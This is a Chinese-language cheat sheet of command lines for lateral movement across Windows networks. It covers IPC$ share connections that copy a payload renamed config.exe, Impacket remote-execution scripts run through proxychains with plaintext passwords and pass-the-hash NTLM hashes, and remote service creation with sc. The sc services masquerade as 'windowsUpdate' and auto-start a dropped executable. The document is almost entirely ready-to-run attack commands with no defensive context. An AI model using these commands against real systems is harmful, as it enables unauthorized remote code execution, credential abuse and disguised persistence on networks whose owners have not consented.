横向移动之命令执行

一、建立IPC连接

net use \\ip\ipc$ "password" /user:"username"
dir \\ip\c$\programdata
copy C:\Users\xx.txt \\ip\c$\programdata\config.exe
del \\ip\c$\1.txt
查看ipc
net use
删除ipc
net use \\ip /del /y

二、impacket套件之atexec.py

proxychains python3 atexec.py test/administrator:1qaz@WSXAa@10.0.0.200 'whoami' -codec=BIG5
proxychains python3 atexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 'whoami' -codec=BIG5

三、impacket套件之dcomexec.py

proxychains python3 dcomexec.py test/administrator:1qaz@WSXAa@10.0.0.200
proxychains python3 dcomexec.py test/administrator:1qaz@WSXAa@10.0.0.200 whoami -codec=BIG5
proxychains python3 dcomexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 administrator:@10.0.0.200

四、impacket套件之psexec.py

proxychains python3 psexec.py test/administrator:1qaz\@WSXAa@10.0.0.200 'whoami' -codec=BIG5
proxychains python3 psexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 'whoami' -codec=BIG5

五、impacket套件之smbexec.py

proxychains python3 smbexec.py test/administrator:1qaz\@WSXAa@10.0.0.200
proxychains python3 smbexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200

六、impacket套件之wmiexec.py

proxychains python3 wmiexec.py test/administrator:1qaz\@WSXAa@10.0.0.200
proxychains python3 wmiexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200
proxychains python3 wmiexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 "ipconfig" -codec=BIG5

七、sc创建服务执行命令

sc \\192.168.0.23 create windowsUpdate binpath= "cmd.exe /c c:\programdata\config.exe"
sc \\192.168.0.23 start windowsUpdate  
sc \\192.168.0.23 delete windowsUpdate  
sc create "SUpdate5" binpath= "cmd /c start "C:\programdata\config2.exe""&&sc config "SUpdate5" start= auto&&net start  SUpdate5